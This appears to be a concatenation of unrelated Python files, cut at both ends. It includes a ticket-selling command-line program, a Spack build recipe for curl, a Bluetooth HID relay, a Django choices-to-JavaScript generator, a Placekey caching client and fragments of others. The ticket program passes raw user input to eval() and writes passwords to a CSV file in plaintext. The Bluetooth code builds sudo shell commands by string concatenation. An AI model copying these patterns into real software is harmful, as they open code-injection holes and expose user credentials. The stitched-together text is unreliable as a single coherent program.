elif input1 == 'exit': # user wants to go to exit session
R8()
else: # user enters other invalid commands
print('invalid command')
R1()
def R2():
# R2 will be the register session, which will allow user to register their account
print('register session started successfully')
try: # if inputs are missing, call R2 again
register_email, register_name, register_password, register_password2 = input('please enter your email, user '
'name, password and confirm your '
'password:\n').split(',')
except:
# option to exit
print('please retype\nthe number of inputs should be 4')
exitOrNot = input('do you want to exit register session(type exit to leave):')
if exitOrNot == 'exit':
R1()
R2()
# do the testing for user inputs, and outputs warning if there is any error. finally, go back to R1
if not (check_register_email(register_email) and check_exits_email(register_email) and check_register_name(
register_name) and check_register_password(register_password) and check_register_password2(
register_password, register_password2)):
R1()
tranWriter.writerow(['registration', register_name, register_email, register_password,
3000]) # write registration information into file
tranFile.flush()
print('account registered')
R1()
def R3():
print('login session started successfully')
try: # if inputs are missing, call R3 again
login_email, login_password = input('please type your email and password:\n').split(',')
except:
print('please retype\nthe number of inputs should be 2')
R1()
if not (check_register_email(login_email) and check_register_password(login_password)):
R1() # check the format of inputs. return R1 if there is anything invalid
for i in accReader: # go over every user info to check login
if not i:
continue
if login_email == i[0] and login_password == i[2]:
global status, user_name, user_email, user_password, balance
# set global value to be the user info if login succeeded
user_name = i[1]
user_email = i[0]
user_password = i[2]
balance = i[3]
status = True
print('account logged in')
R1()
# return R1 if failed
print('login failed')
R1()
def R4():
print('selling session started successfully')
try: # if inputs are missing, call R4 again
ticket_name, price, quantity, date = input('please type ticket name, price, quantity, date:\n').split(',')
except:
print('please retype\nthe number of inputs should be 4')
R1()
if not (check_ticket_name(ticket_name) and check_price(price) and check_quantity_sell(quantity) and check_date(
date)):
R1() # check the format of inputs. return R1 if there is anything invalid
price = eval(price)
price = round(price, 2)
# write the transaction
tranWriter.writerow(['selling', user_email, ticket_name, price, quantity])
tranFile.flush()
print('selling transaction was created successfully')
R1()
def R5():
print('buying session started successfully')
try: # if inputs are missing, call R5 again
ticket_name, quantity = input('please type ticket name, quantity:\n').split(',')
except:
print('please retype\nthe number of inputs should be 2')
R1()
if not (check_ticket_name(ticket_name)):
R1() # check the format of inputs. return R1 if there is anything invalid
count = 0
for i in ticketReader: # go over every ticket to check if exists
if not i:
continue
if ticket_name == i[0]:
price = i[1]
aval_quantity = i[2]
count += 1
if count == 0:
print('the ticket does not exist')
R1()
if not (check_quantity_buy(price, quantity, aval_quantity)):
R1() # check the format of inputs. return R1 if there is anything invalid
price = eval(price)
price = round(price, 2)
# write the transaction
tranWriter.writerow(['buying', user_email, ticket_name, price, quantity])
tranFile.flush()
print('buying transaction was created successfully')
R1()
def R6():
print('updating session started successfully')
try: # if inputs are missing, call R6 again
ticket_name, price, quantity, date = input('please type ticket name, price, quantity, date:\n').split(',')
except:
print('please retype\nthe number of inputs should be 4')
R1()
if not (check_ticket_name(ticket_name) and check_price(price) and check_quantity_sell(quantity) and check_date(
date)):
R1() # check the format of inputs. return R1 if there is anything invalid
count = 0
for i in ticketReader: # go over every ticket to check if exists
if not i:
continue
if ticket_name == i[0] and user_email == i[3]:
count += 1
if count == 0:
print('the ticket does not exist')
R1()
price = eval(price)
price = round(price, 2)
# write the transaction
tranWriter.writerow(['updating', user_email, ticket_name, price, quantity])
tranFile.flush()
print('updating transaction was created successfully')
R1()
def R7():
global status, user_name, user_email, user_password, balance
if status: # user already logged in
print("logout successfully")
user_name = ''
user_email = ''
user_password = ''
balance = -1
status = False
else: # user has not logged in
print("you are not login\nplease enter login")
def R8():
print('exit')
# close three resource files
accFile.close()
ticketFile.close()
tranFile.close()
exit(0)
'''
this function will check the ticket name format
'''
def check_ticket_name(ticket_name):
if not (ticket_name.replace(' ','').isalnum()):
print('transaction was created unsuccessfully\nplease retype\nticket name should be '
'alphanumeric-only')
return False
if ticket_name[0].isspace() or ticket_name[len(ticket_name) - 1].isspace():
print('transaction was created unsuccessfully\nplease retype\nspace allowed only if it is not the '
'first or the last character')
return False
elif len(ticket_name) > 60:
print('transaction was created unsuccessfully\nplease retype\nthe ticket name should be no longer '
'than 60 characters')
return False
return True
'''
this function will check the price valid
'''
def check_price(price):
if not (price.isdigit()):
print('transaction was created unsuccessfully\nplease retype\nthe ticket price should be numeric')
return False
price = eval(price)
if not (10 <= price <= 100):
print('transaction was created unsuccessfully\nplease retype\nthe ticket price should be of range ['
'10, 100]')
return False
return True
'''
this function will check the quantity valid when selling
'''
def check_quantity_sell(quantity):
quantity = eval(quantity)
if not (isinstance(quantity, int)):
print('transaction was created unsuccessfully\nplease retype\nthe ticket quantity should be an '
'integer')
return False
if not (0 < quantity <= 100):
print('transaction was created unsuccessfully\nplease retype\nthe quantity of the tickets has to be '
'more than 0, and less than or equal to 100')
return False
return True
'''
this function will check date format
'''
def check_date(date):
try:
time.strptime(date, "%Y%m%d")
return True
except:
print('transaction was created unsuccessfully\nplease retype\ndate must be given in the format '
'YYYYMMDD')
return False
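# Illustrative examples (comments only, added for clarity): with the "%Y%m%d" format
# above, check_date('20240229') returns True, while check_date('2024-02-29') and
# check_date('20240230') both print the error message and return False.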
'''
this function will check the quantity valid when buying
'''
def check_quantity_buy(price, quantity, aval_quantity):
price = eval(price)
quantity = eval(quantity)
aval_quantity = eval(aval_quantity)
if not (isinstance(quantity, int)):
print('transaction was created unsuccessfully\nplease retype\nthe ticket quantity should be an '
'integer')
return False
if not (0 < quantity <= aval_quantity):
print('transaction was created unsuccessfully\nplease retype\nthe quantity of the tickets has to be '
'more than 0, and less than or equal to the available quantity')
return False
elif not (float(balance) >= price * quantity * 1.35 * 1.05):
print('transaction was created unsuccessfully\nplease retype\nyour balance is insufficient')
return False
return True
'''
this function will take a string of user email as input, and True or False as output
it will check if the format of the email is correct
'''
def check_register_email(register_email):
# if the format of input email is not as follows, return false
if re.match("^.+\\@(\\[?)[a-zA-Z0-9\\-\\.]+\\.([a-zA-Z]{2,3}|[0-9]{1,3})(\\]?)$", register_email) is None:
print("email format is incorrect\n")
return False
return True
'''
this function will take a string of user email as input, and True or False as output
it will check if the email already exists
'''
def check_exits_email(register_email):
accReader = csv.reader(open('accounts.csv', 'r')) # read the file
# if input email already exists, return False
for i in accReader:
if not i:
continue
elif register_email == i[0]:
print("account exits\n")
return False
return True
'''
this function will take a string of user name as input, and True or False as output
it will check if the format of the user name is correct
'''
def check_register_name(register_name):
# name can only be alphanumerical
if not (register_name.replace(' ', '').isalnum()):
print('user name format is incorrect (User name should be alphanumeric-only)\n')
return False
# space allowed only if it's not the first and last character
if (register_name[0] == ' ' or register_name[len(register_name) - 1] == ' '):
print('user name format is incorrect (Space allowed only if it is not the first or the last character)\n')
return False
# length of name should be longer than 2 and shorter than 20
elif len(register_name) >= 20 or len(register_name) <= 2 :
print('user name format is incorrect (User name should be longer than 2 and shorter than 20 characters)\n')
return False
return True
'''
this function will take a string of user password as input, and True or False as output
it will check if the format of the user password is correct
'''
def check_register_password(register_password):
# if the format of input password is not as follows, return false
# at least one upper and one lower case with special characters, minimum 6 in length
#pattern = r'^(?![A-Za-z0-9]+$)(?![a-z0-9\\W]+$)(?![A-Za-z\\W]+$)(?![A-Z0-9\\W]+$)^.{6,}$'
pattern = '^(?=.*[a-z])(?=.*[A-Z])(?=.*[-+_!@#$%^&*., ?])^.{6,}$'
# Compile the ReGex
res = re.compile(pattern)
if re.search(res, register_password):
return True
print('password format is incorrect\n')
return False
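# Illustrative examples (comments only, added for clarity): the pattern above requires
# at least one lowercase letter, one uppercase letter, one character from the set
# -+_!@#$%^&*., ? and a minimum length of 6. For instance, a hypothetical input such as
# 'Abc!123' passes, while 'abc123' (no uppercase, no special character) and
# 'ABC!DEF' (no lowercase) both fail.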
'''
this function will take two strings of user passwords as input, and True or False as output
it will check if the two inputs are the same
'''
def check_register_password2(register_password, register_password2):
if register_password == register_password2:
return True
print("two password doesn't match, please confirm your password\n")
return False
if __name__ == "__main__":
main()
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
import sys
from spack import *
class Curl(AutotoolsPackage):
"""cURL is an open source command line tool and library for
transferring data with URL syntax"""
homepage = "https://curl.se/"
# URL must remain http:// so Spack can bootstrap curl
url = "http://curl.haxx.se/download/curl-7.78.0.tar.bz2"
executables = ['^curl$']
version('7.81.0', sha256='1e7a38d7018ec060f1f16df839854f0889e94e122c4cfa5d3a37c2dc56f1e258')
version('7.80.0', sha256='dd0d150e49cd950aff35e16b628edf04927f0289df42883750cf952bb858189c')
version('7.79.1', sha256='de62c4ab9a9316393962e8b94777a570bb9f71feb580fb4475e412f2f9387851')
version('7.79.0', sha256='d607a677f473f79f96c964100327125a6204a39d835dc00dab7fc0129b959f42')
version('7.78.0', sha256='98530b317dc95ccb324bbe4f834f07bb642fbc393b794ddf3434f246a71ea44a')
version('7.77.0', sha256='6c0c28868cb82593859fc43b9c8fdb769314c855c05cf1b56b023acf855df8ea')
version('7.76.1', sha256='7a8e184d7d31312c4ebf6a8cb59cd757e61b2b2833a9ed4f9bf708066e7695e9')
version('7.76.0', sha256='e29bfe3633701590d75b0071bbb649ee5ca4ca73f00649268bd389639531c49a')
version('7.75.0', sha256='50552d4501c178e4cc68baaecc487f466a3d6d19bbf4e50a01869effb316d026')
version('7.74.0', sha256='0f4d63e6681636539dc88fa8e929f934cd3a840c46e0bf28c73be11e521b77a5')
version('7.73.0', sha256='cf34fe0b07b800f1c01a499a6e8b2af548f6d0e044dca4a29d88a4bee146d131')
version('7.72.0', sha256='ad91970864102a59765e20ce16216efc9d6ad381471f7accceceab7d905703ef')
version('7.71.0', sha256='600f00ac2481a89548a4141ddf983fd9386165e1960bac91d0a1c81dca5dd341')
version('7.68.0', sha256='207f54917dd6a2dc733065ccf18d61bb5bebeaceb5df49cd9445483e8623eeb9')
version('7.64.0', sha256='d573ba1c2d1cf9d8533fadcce480d778417964e8d04ccddcc76e591d544cf2eb')
version('7.63.0', sha256='9bab7ed4ecff77020a312d84cc5fb7eb02d58419d218f267477a724a17fd8dd8')
version('7.60.0', sha256='897dfb2204bd99be328279f88f55b7c61592216b0542fcbe995c60aa92871e9b')
version('7.59.0', sha256='b5920ffd6a8c95585fb95070e0ced38322790cb335c39d0dab852d12e157b5a0')
version('7.56.0', sha256='de60a4725a3d461c70aa571d7d69c788f1816d9d1a8a2ef05f864ce8f01279df')
version('7.54.0', sha256='f50ebaf43c507fa7cc32be4b8108fa8bbd0f5022e90794388f3c7694a302ff06')
version('7.53.1', sha256='1c7207c06d75e9136a944a2e0528337ce76f15b9ec9ae4bb30d703b59bf530e8')
version('7.52.1', sha256='d16185a767cb2c1ba3d5b9096ec54e5ec198b213f45864a38b3bda4bbf87389b')
version('7.50.3', sha256='7b7347d976661d02c84a1f4d6daf40dee377efdc45b9e2c77dedb8acf140d8ec')
version('7.50.2', sha256='0c72105df4e9575d68bcf43aea1751056c1d29b1040df6194a49c5ac08f8e233')
version('7.50.1', sha256='3c12c5f54ccaa1d40abc65d672107dcc75d3e1fcb38c267484334280096e5156')
version('7.49.1', sha256='eb63cec4bef692eab9db459033f409533e6d10e20942f4b060b32819e81885f1')
version('7.47.1', sha256='ddc643ab9382e24bbe4747d43df189a0a6ce38fcb33df041b9cb0b3cd47ae98f')
version('7.46.0', sha256='b7d726cdd8ed4b6db0fa1b474a3c59ebbbe4dcd4c61ac5e7ade0e0270d3195ad')
version('7.45.0', sha256='65154e66b9f8a442b57c436904639507b4ac37ec13d6f8a48248f1b4012b98ea')
version('7.44.0', sha256='1e2541bae6582bb697c0fbae49e1d3e6fad5d05d5aa80dbd6f072e0a44341814')
version('7.43.0', sha256='baa654a1122530483ccc1c58cc112fec3724a82c11c6a389f1e6a37dc8858df9')
version('7.42.1', sha256='e2905973391ec2dfd7743a8034ad10eeb58dab8b3a297e7892a41a7999cac887')
default_tls = 'openssl'
if sys.platform == 'darwin':
default_tls = 'secure_transport'
# TODO: add dependencies for other possible TLS backends
values_tls = [
# 'amissl',
# 'bearssl',
'gnutls',
'mbedtls',
# 'mesalink',
'nss',
'openssl',
# 'rustls',
# 'schannel',
'secure_transport',
# 'wolfssl',
]
variant('tls', default=default_tls, description='TLS backend', values=values_tls, multi=True)
variant('nghttp2', default=False, description='build nghttp2 library (requires C++11)')
variant('libssh2', default=False, description='enable libssh2 support')
variant('libssh', default=False, description='enable libssh support') # , when='7.58:')
variant('gssapi', default=False, description='enable Kerberos support')
variant('librtmp', default=False, description='enable Rtmp support')
variant('ldap', default=False, description='enable ldap support')
variant('libidn2', default=False, description='enable libidn2 support')
conflicts('+libssh', when='@:7.57')
# on OSX and --with-ssh the configure steps fails with
# one or more libs available at link-time are not available run-time
# unless the libssh are installed externally (e.g. via homebrew), even
# though spack isn't supposed to know about such a libssh installation.
# C.f. https://github.com/spack/spack/issues/7777
conflicts('platform=darwin', when='+libssh2')
conflicts('platform=darwin', when='+libssh')
conflicts('platform=cray', when='tls=secure_transport', msg='Only supported on macOS')
conflicts('platform=linux', when='tls=secure_transport', msg='Only supported on macOS')
conflicts('tls=mbedtls', when='@:7.45')
depends_on('gnutls', when='tls=gnutls')
depends_on('mbedtls@3:', when='@7.79: tls=mbedtls')
depends_on('mbedtls@:2', when='@:7.78 tls=mbedtls')
depends_on('nss', when='tls=nss')
depends_on('openssl', when='tls=openssl')
depends_on('libidn2', when='+libidn2')
depends_on('zlib')
depends_on('nghttp2', when='+nghttp2')
depends_on('libssh2', when='+libssh2')
depends_on('libssh', when='+libssh')
depends_on('krb5', when='+gssapi')
# curl queries pkgconfig for openssl compilation flags
depends_on('pkgconfig', type='build')
@classmethod
def determine_version(cls, exe):
curl = Executable(exe)
output = curl('--version', output=str, error=str)
match = re.match(r'curl ([\d.]+)', output)
return match.group(1) if match else None
@classmethod
def determine_variants(cls, exes, version):
for exe in exes:
variants = ''
curl = Executable(exe)
output = curl('--version', output=str, error=str)
if 'nghttp2' in output:
variants += '+nghttp2'
protocols_match = re.search(r'Protocols: (.*)\n', output)
if protocols_match:
protocols = protocols_match.group(1).strip().split(' ')
if 'ldap' in protocols:
variants += '+ldap'
features_match = re.search(r'Features: (.*)\n', output)
if features_match:
features = features_match.group(1).strip().split(' ')
if 'GSS-API' in features:
variants += '+gssapi'
# TODO: Determine TLS backend if needed.
# TODO: Determine more variants.
return variants
def configure_args(self):
spec = self.spec
args = [
'--with-zlib=' + spec['zlib'].prefix,
# Prevent unintentional linking against system libraries: we could
# add variants for these in the future
'--without-brotli',
'--without-libgsasl',
'--without-libpsl',
'--without-zstd',
]
# Make gnutls / openssl decide what certs are trusted.
# TODO: certs for other tls options.
if spec.satisfies('tls=gnutls') or spec.satisfies('tls=openssl'):
args.extend([
'--without-ca-bundle',
'--without-ca-path',
'--with-ca-fallback',
])
# https://daniel.haxx.se/blog/2021/06/07/bye-bye-metalink-in-curl/
# We always disable it explicitly, but the flag is gone in newer
# versions.
if spec.satisfies('@:7.77'):
args.append('--without-libmetalink')
if spec.satisfies('+gssapi'):
args.append('--with-gssapi=' + spec['krb5'].prefix)
else:
args.append('--without-gssapi')
args += self.with_or_without('tls')
args += self.with_or_without('libidn2', 'prefix')
args += self.with_or_without('librtmp')
args += self.with_or_without('nghttp2')
args += self.with_or_without('libssh2')
args += self.with_or_without('libssh')
args += self.enable_or_disable('ldap')
return args
def with_or_without_gnutls(self, activated):
if activated:
return '--with-gnutls=' + self.spec['gnutls'].prefix
else:
return '--without-gnutls'
def with_or_without_mbedtls(self, activated):
if self.spec.satisfies('@7.46:'):
if activated:
return '--with-mbedtls=' + self.spec['mbedtls'].prefix
else:
return '--without-mbedtls'
def with_or_without_nss(self, activated):
if activated:
return '--with-nss=' + self.spec['nss'].prefix
else:
return '--without-nss'
def with_or_without_openssl(self, activated):
if self.spec.satisfies('@7.77:'):
if activated:
return '--with-openssl=' + self.spec['openssl'].prefix
else:
return '--without-openssl'
else:
if activated:
return '--with-ssl=' + self.spec['openssl'].prefix
else:
return '--without-ssl'
def with_or_without_secure_transport(self, activated):
if self.spec.satisfies('@7.65:'):
if activated:
return '--with-secure-transport'
else:
return '--without-secure-transport'
else:
if activated:
return '--with-darwinssl'
else:
return '--without-darwinssl'
|
# Copyright (c) 2020 ruundii. All rights reserved.
import asyncio
import socket
import os
from typing import Awaitable, Callable, Dict, List, Optional, TYPE_CHECKING
from dasbus.connection import SystemMessageBus
if TYPE_CHECKING:
from hid_devices import HIDDeviceRegistry
OBJECT_MANAGER_INTERFACE = 'org.freedesktop.DBus.ObjectManager'
DEVICE_INTERFACE = 'org.bluez.Device1'
PROPERTIES_INTERFACE = 'org.freedesktop.DBus.Properties'
INPUT_DEVICE_INTERFACE = 'org.bluez.Input1'
INPUT_HOST_INTERFACE = 'org.bluez.InputHost1'
IGNORE_INPUT_DEVICES = True
class BluetoothDevice:
def __init__(self, bus: SystemMessageBus, loop: asyncio.AbstractEventLoop,
device_registry: "BluetoothDeviceRegistry", object_path: str,
is_host: bool, control_socket_path: str, interrupt_socket_path: str):
self.device = bus.get_proxy(service_name="org.bluez", object_path=object_path, interface_name=DEVICE_INTERFACE)
self.props = bus.get_proxy(service_name="org.bluez", object_path=object_path, interface_name=PROPERTIES_INTERFACE)
self.props.PropertiesChanged.connect(self.device_connected_state_changed)
self.bus = bus
self.loop = loop
self.device_registry = device_registry
self.object_path = object_path
self.is_host = is_host
self.control_socket_path: Optional[str] = control_socket_path
self.control_socket: Optional[socket.socket] = None
self.interrupt_socket_path: Optional[str] = interrupt_socket_path
self.interrupt_socket: Optional[socket.socket] = None
self.sockets_connected = False
print("BT Device ",object_path," created")
asyncio.run_coroutine_threadsafe(self.reconcile_connected_state(1), loop=self.loop)
async def reconcile_connected_state(self, delay: int) -> None:
await asyncio.sleep(delay)
try:
if self.connected and not self.sockets_connected:
await self.connect_sockets()
elif not self.connected and self.sockets_connected:
self.disconnect_sockets()
except Exception as exc:
print("Possibly dbus error during reconcile_connected_state ",exc)
async def connect_sockets(self) -> None:
if self.sockets_connected or self.control_socket_path is None or self.interrupt_socket_path is None:
return
print("Connecting sockets for ",self.object_path)
if not self.connected:
print("BT Device is not connected. No point connecting sockets. Skipping.")
return
try:
self.control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
self.control_socket.connect(self.control_socket_path)
self.control_socket.setblocking(False)
self.interrupt_socket = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
self.interrupt_socket.connect(self.interrupt_socket_path)
self.interrupt_socket.setblocking(False)
self.sockets_connected = True
if(self.is_host):
self.device_registry.connected_hosts.append(self)
addr = self.object_path[-17:].replace("_",":")
asyncio.create_task(self.device_registry.switch_to_master(addr))
else:
self.device_registry.connected_devices.append(self)
print("Connected sockets for ",self.object_path)
asyncio.run_coroutine_threadsafe(self.loop_of_fun(True), loop=self.loop)
asyncio.run_coroutine_threadsafe(self.loop_of_fun(False), loop=self.loop)
except Exception as err:
print("Error while connecting sockets for ",self.object_path,". Will retry in a sec", err)
try:
if self.control_socket is not None:
self.control_socket.close()
if self.interrupt_socket is not None:
self.interrupt_socket.close()
except:
pass
await asyncio.sleep(1)
asyncio.run_coroutine_threadsafe(self.connect_sockets(), loop=self.loop)
def disconnect_sockets(self) -> None:
if self.control_socket is not None:
self.control_socket.close()
self.control_socket = None
if self.interrupt_socket is not None:
self.interrupt_socket.close()
self.interrupt_socket = None
if(self.is_host and self in self.device_registry.connected_hosts):
self.device_registry.connected_hosts.remove(self)
elif self in self.device_registry.connected_devices:
self.device_registry.connected_devices.remove(self)
self.sockets_connected = False
print("Disconnected sockets for ",self.object_path)
async def loop_of_fun(self, is_ctrl: bool) -> None:
sock = self.control_socket if is_ctrl else self.interrupt_socket
while sock is not None:
try:
msg = await self.loop.sock_recv(sock,255)
except Exception:
print("Cannot read data from socket. ", self.object_path ,"Closing sockets")
if self is not None:
try:
self.disconnect_sockets()
except:
print("Error while disconnecting sockets")
print("Arranging reconnect")
asyncio.run_coroutine_threadsafe(self.reconcile_connected_state(1), loop=self.loop)
break
if msg is None or len(msg)==0:
continue
self.device_registry.send_message(msg, not self.is_host, is_ctrl)
sock = self.control_socket if is_ctrl else self.interrupt_socket
@property
def name(self) -> str:
return self.device.Name
@property
def alias(self) -> str:
return self.device.Alias
@property
def connected(self) -> bool:
return self.device.Connected
def __eq__(self, other: object) -> bool:
if isinstance(other, BluetoothDevice):
return self.object_path == other.object_path
return False
def device_connected_state_changed(self, _arg1: object, _arg2: object, _arg3: object) -> None:
print("device_connected_state_changed")
asyncio.run_coroutine_threadsafe(self.reconcile_connected_state(1), loop=self.loop)
if self.device_registry.on_devices_changed_handler is not None:
asyncio.run_coroutine_threadsafe(self.device_registry.on_devices_changed_handler(), loop=self.loop)
def finalise(self) -> None:
self.props.PropertiesChanged.disconnect(self.device_connected_state_changed)
self.control_socket_path = None
self.interrupt_socket_path = None
# Close sockets
self.disconnect_sockets()
print("BT Device ",self.object_path," finalised")
def __del__(self) -> None:
print("BT Device ",self.object_path," removed")
class BluetoothDeviceRegistry:
def __init__(self, bus: SystemMessageBus, loop: asyncio.AbstractEventLoop):
self.bus = bus
self.loop = loop
self.all: Dict[str, BluetoothDevice] = {}
self.connected_hosts: List[BluetoothDevice] = []
self.connected_devices: List[BluetoothDevice] = []
self.on_devices_changed_handler: Optional[Callable[[], Awaitable[None]]] = None
self.hid_devices: Optional["HIDDeviceRegistry"] = None
self.current_host_index = 0
def set_hid_devices(self, hid_devices: "HIDDeviceRegistry") -> None:
self.hid_devices = hid_devices
def set_on_devices_changed_handler(self, handler: Callable[[], Awaitable[None]]) -> None:
self.on_devices_changed_handler = handler
def add_devices(self) -> None:
print("Adding all BT devices")
om = self.bus.get_proxy(service_name= "org.bluez", object_path="/", interface_name=OBJECT_MANAGER_INTERFACE)
objs = om.GetManagedObjects()
for obj in list(objs):
if INPUT_HOST_INTERFACE in objs[obj]:
self.add_device(obj, True)
elif INPUT_DEVICE_INTERFACE in objs[obj]:
self.add_device(obj, False)
def add_device(self, device_object_path: str, is_host: bool) -> None:
if(IGNORE_INPUT_DEVICES and not is_host): return
if device_object_path in self.all:
print("Device ", device_object_path, " already exist. Cannot add. Skipping.")
return
#ensure master role for this connection, otherwise latency of sending packets to hosts may get pretty bad
asyncio.ensure_future(self.switch_to_master(device_object_path[-17:].replace("_",":")))
p = self.bus.get_proxy(service_name="org.bluez", object_path=device_object_path, interface_name=INPUT_HOST_INTERFACE if is_host else INPUT_DEVICE_INTERFACE)
device = BluetoothDevice(self.bus, self.loop, self, device_object_path, is_host, p.SocketPathCtrl, p.SocketPathIntr)
self.all[device_object_path] = device
async def switch_to_master(self, device_address: str) -> None:
print("switch to master called for ", device_address)
while self.is_slave(device_address):
try:
success = os.system("sudo hcitool sr " + device_address + " MASTER") == 0
print("hcitool ",device_address," success:",success)
except Exception as exc:
print("hcitool ",device_address," exception:",exc)
await asyncio.sleep(5)
def is_slave(self, device_address: str) -> bool:
with os.popen('sudo hcitool con') as stream:
return any("SLAVE" in l and device_address in l for l in stream.readlines())
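# Illustrative note (added for clarity; exact output may vary by BlueZ version):
# 'sudo hcitool con' prints one line per ACL link, e.g.
#   < ACL AA:BB:CC:DD:EE:FF handle 11 state 1 lm SLAVE AUTH ENCRYPT
# so a line containing both the device address and the word SLAVE means the local
# adapter currently has the slave role for that connection.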
def remove_devices(self) -> None:
print("Removing all BT devices")
while len(self.all) >0:
self.remove_device(list(self.all)[0])
def remove_device(self, device_object_path: str) -> None:
if device_object_path not in self.all:
return # No such device
device = self.all[device_object_path]
del self.all[device_object_path]
device_list = self.connected_hosts if device.is_host else self.connected_devices
if device in device_list:
device_list.remove(device)
device.finalise()
del device
def switch_host(self) -> None:
self.current_host_index = (self.current_host_index + 1) % len(self.connected_hosts)
def __get_current_host_as_list(self) -> List[BluetoothDevice]:
if len(self.connected_hosts) <= self.current_host_index:
return []
return [self.connected_hosts[self.current_host_index]]
def send_message(self, msg: bytes, send_to_hosts: bool, is_control_channel: bool) -> None:
if IGNORE_INPUT_DEVICES and not send_to_hosts and not is_control_channel and self.hid_devices is not None:
asyncio.run_coroutine_threadsafe(self.hid_devices.send_message_to_devices(msg), loop=self.loop)
return
targets: List[BluetoothDevice] = self.__get_current_host_as_list() if send_to_hosts else self.connected_devices
for target in list(targets):
try:
socket = target.control_socket if is_control_channel else target.interrupt_socket
if socket is not None:
socket.sendall(msg)
except Exception:
print("Cannot send data to socket of ",target.object_path,". Closing")
if target is not None:
try:
target.disconnect_sockets()
except:
print("Error while trying to disconnect sockets")
asyncio.run_coroutine_threadsafe(target.reconcile_connected_state(1), loop=self.loop)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django.apps import apps
from django.conf import settings
from django.template import loader
from django.utils.encoding import force_text
from django.utils.translation import activate, deactivate
from . import js_choices_settings as default_settings
from . import rjsmin
def prepare_choices(choices):
new_choices = []
for choice in choices:
if len(choice) != 2:
continue
try:
json.dumps(choice[0])
new_choices.append((choice[0], force_text(choice[1])))
except TypeError:
new_choices.append((force_text(choice[0]), force_text(choice[1])))
return new_choices
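# Hypothetical example of the transformation above (added for clarity): keys that are
# not JSON serialisable are coerced to text, everything else is kept as-is, e.g.
#   prepare_choices([(1, 'One'), (datetime.date(2020, 1, 1), 'New year')])
#   -> [(1, 'One'), ('2020-01-01', 'New year')]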
def generate_js(locale=None):
raw_choices = []
named_choices = {}
conflicting_names = set()
if locale:
activate(locale)
for app_config in apps.get_app_configs():
for model in app_config.get_models():
for field in model._meta.get_fields():
try:
choices = [x for x in getattr(field, "flatchoices", [])]
assert len(choices)
except Exception:
continue
short_name = field.name
medium_name = "{}_{}".format(model._meta.model_name.lower(), field.name)
full_name = "{}_{}".format(model._meta.label_lower.replace(".", "_"), field.name)
value = json.dumps(prepare_choices(choices))
try:
index = raw_choices.index(value)
except ValueError:
index = len(raw_choices)
raw_choices.append(value)
for name in [short_name, medium_name, full_name]:
if name not in named_choices:
named_choices[name] = index
elif raw_choices[named_choices[name]] != value:
conflicting_names.add(name)
for name in conflicting_names:
del named_choices[name]
if locale:
deactivate()
js_var_name = getattr(settings, "JS_CHOICES_JS_VAR_NAME", default_settings.JS_VAR_NAME)
js_global_object_name = getattr(
settings, "JS_CHOICES_JS_GLOBAL_OBJECT_NAME", default_settings.JS_GLOBAL_OBJECT_NAME
)
minify = getattr(settings, "JS_CHOICES_JS_MINIFY", default_settings.JS_MINIFY)
js_content = loader.render_to_string(
"django_js_choices/choices_js.tpl",
{
"raw_choices_list": raw_choices,
"named_choices": json.dumps(named_choices),
"js_var_name": js_var_name,
"js_global_object_name": js_global_object_name,
},
)
if minify:
js_content = rjsmin.jsmin(js_content)
return js_content
|
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
"""
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
"""
class Scenario:
"""
Class to represent scenario object
"""
def __init__(self, name, scenario_manager=None):
"""
Constructor for scenario class
"""
self.name = name
self.scenario_manager = scenario_manager
self.parameters = []
def get_scenario_parameters(self):
return self.parameters
|
from typing import Optional
import diskcache
import placekey.api
from ..utils.log import getLogger
from .common import CachedAPI, calculate_cache_key
logger = getLogger(__file__)
class PlacekeyAPI(CachedAPI):
"""API for calling placekey that checks the cache first"""
def __init__(self, api_cache: diskcache.Cache, apikey: str):
self._placekey_api = placekey.api.PlacekeyAPI(apikey)
super().__init__(api_cache)
def lookup_placekey(
self,
latitude: float,
longitude: float,
location_name: str,
street_address: str,
city: str,
region: str,
postal_code: str,
iso_country_code: str = "US",
strict_address_match: bool = False,
strict_name_match: bool = False,
) -> Optional[str]:
cache_key = calculate_cache_key(
"placekey",
[
f"{latitude:.5f}",
f"{longitude:.5f}",
location_name,
street_address,
city,
region,
postal_code,
iso_country_code,
str(strict_address_match),
str(strict_name_match),
],
)
cache_response = self.api_cache.get(cache_key)
if cache_response:
if "error" in cache_response:
return None
return cache_response.get("placekey")
response = self._placekey_api.lookup_placekey(
latitude=latitude,
longitude=longitude,
location_name=location_name,
street_address=street_address,
city=city,
region=region,
postal_code=postal_code,
iso_country_code=iso_country_code,
strict_address_match=strict_address_match,
strict_name_match=strict_name_match,
)
if not response:
return None
if "error" in response:
logger.info("Failed to add placekey because: %s", response["error"])
self.set_with_expire(cache_key, {"error": response["error"]})
return None
placekey_id = response.get("placekey")
self.set_with_expire(cache_key, {"placekey": placekey_id})
return placekey_id
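# Minimal usage sketch (added for clarity; the cache path, API key and address below
# are placeholders, not part of the original module):
#   cache = diskcache.Cache('/tmp/api_cache')
#   api = PlacekeyAPI(api_cache=cache, apikey='YOUR_API_KEY')
#   pk = api.lookup_placekey(37.7371, -122.4428, 'Some Cafe', '123 Example St',
#                            'San Francisco', 'CA', '94114')
# Repeated calls with the same rounded coordinates and address fields are served from
# the diskcache entry instead of hitting the upstream Placekey API again.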
|
from app.utils import exceptions
from app.utils import response_factory
from app.utils.constants import JWT_EXPIRATION_TIME
from app.utils import jwt_utils
from app.utils import decorators
|
from mrcp.panel import *
from mrcp.points import *
from mrcp.config import *
class Led(BaseElement):
def __init__(self, pos=Point(0, 0), color=LED_COLOR) -> None:
super().__init__(pos=pos, color=color)
def paint(self):
found = searchLed(self._panel, self._pos)
#print("Found", found, self)
if found != self:
# there is another which is not self
# only the first will be painted
return
pos = self._pos.toCoords()
dwg = self._panel._dwg
cutLayer = self._panel._cLayer
ledLayer = self._panel._lLayer
color = self._color
